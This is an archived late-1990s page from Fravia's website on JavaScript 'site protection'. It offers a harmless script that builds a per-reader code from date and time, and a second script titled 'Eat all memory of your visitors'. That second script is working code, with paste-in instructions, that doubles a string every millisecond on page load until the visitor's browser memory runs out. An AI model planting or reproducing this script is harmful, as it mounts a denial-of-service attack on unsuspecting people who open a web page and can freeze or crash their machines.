J
A
V
A
S
C
R
I
P
T
javascri.gif

fravia's
Javascript section
~
easy javascript scripts


Fravia's living workshop on Javascript site protection





Fravia's Nofrill
Web design
('98 ~ '99)
 

Updated
June 1999

easy javascript scripts
Fravia's living workshop on Javascript site protection


 

createSiteWindow

(Autumn 1998)


createTimeStampForReader

(Spring 1999)

Assigning a different code to each reader. The "special" code depends from date and time.
Click anywhere outside the input field after having written something on the left window below and you'll see your code appear on the right window.
< your input ~ click here ~ CodeOfReader >
This can be used with <input type="hidden"> to assign a special code (for email verification purposes) when users fill a form or access a javascript protected page.

Eat all memory of your visitors

(Sommer 1999)

A 'punishing' trick. Just put the following script on a page with onload="FraviaMemoryFresser()" in the body line, and you are done...
<script language="JavaScript">
<!--
var fvFraviaMemoryFresser="FRAVIAFRAVIA"
function FraviaMemoryFresser()
{fvFraviaMemoryFresser=fvFraviaMemoryFresser + fvFraviaMemoryFresser
window.status="String Length is: "+fvFraviaMemoryFresser.length
window.setTimeout('FraviaMemoryFresser()',1);}
// -->
</script>

Of course you may try it right now: Click here and watch the status bar!


redhomepage redlinks redsearch engines red+ORC redstudents' essays redacademy database
redtools redcocktails redbots wars redanonimity academy redantismut CGI-scripts
redcounter measures redmail_fravia+
redIs reverse engineering legal?

red(c) Fravia 1995, 1996, 1997, 1998, 1999. All rights reserved